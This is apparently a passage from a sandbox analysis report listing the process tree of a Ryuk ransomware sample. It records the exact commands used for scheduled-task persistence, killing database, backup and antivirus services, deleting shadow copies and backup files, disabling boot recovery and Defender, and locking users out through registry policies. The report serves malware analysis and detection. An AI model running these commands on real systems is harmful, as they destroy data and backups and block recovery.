- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2920

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:3600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4208

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4896

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:3292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4860

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
3⤵
- Creates scheduled task(s)
PID:3708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:5060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4392

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:3476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:1828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:2084

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
- Suspicious use of WriteProcessMemory
PID:4240

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3940

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:3752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:4088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:3148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:2008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:3540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3460

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:3544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:4908

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:4052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:4168

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
2⤵
PID:4476

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
3⤵
- Checks computer location settings
- Modifies registry class
PID:1084

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
4⤵
- Opens file in notepad (likely ransom note)
PID:5008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:3484

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:1776

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:116

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:4340

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:3060

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:2152

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:4276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:1048

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:3912

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:3784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:3696

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:4808

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:1424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:4408

C:\Windows\system32\net.exe
net stop avpsus /y
3⤵
PID:1428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:1240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:2896

C:\Windows\system32\net.exe
net stop McAfeeDLPAgentService /y
3⤵
PID:1976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:2376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:4952

C:\Windows\system32\net.exe
net stop mfewc /y
3⤵
PID:2212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:3984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:4868

C:\Windows\system32\net.exe
net stop BMR Boot Service /y
3⤵
PID:2796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:2756

C:\Windows\system32\net.exe
net stop NetBackup BMR MTFTP Service /y
3⤵
PID:868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:2220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:1176

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY start=disabled
3⤵
- Launches sc.exe
PID:3760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:3512

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:4308

C:\Windows\system32\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:1716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:1980

C:\Windows\system32\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:2904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:4916

C:\Windows\system32\taskkill.exe
taskkill /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:2540

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:872

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:4348

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:1364

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:3212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:4488

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:3312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:4872

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:3220

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:4128

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:1236

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:2792

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:4824

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:4060

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:1744

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:5052

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:4284

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:4256

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:4840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
2⤵
PID:740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
2⤵
PID:1168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
2⤵
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
2⤵
PID:2492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
2⤵
PID:2876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
2⤵
PID:1248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:3716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
2⤵
PID:4804

C:\Windows\system32\attrib.exe
attrib +h +s hrmlog2
3⤵
- Views/modifies file attributes
PID:4076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
2⤵
PID:2356

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\hrmlog2
3⤵
- Views/modifies file attributes
PID:3696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:5016

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:1452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:3352

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:3572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1504

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:5076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1400

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:3500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:3540

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:3456

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:4008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:4696

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:3328

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:288

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:1240

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:4432

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:2468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:2124

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:1288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:3592

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:1796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:3568

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:2096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:984

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:2480

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:3008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:4784

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:1312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:1636

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:4072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:3976

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:3612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:4624

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:4848

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:3128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1952

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:3188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:5072

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:2040

C:\Windows\system32\cmd.exe
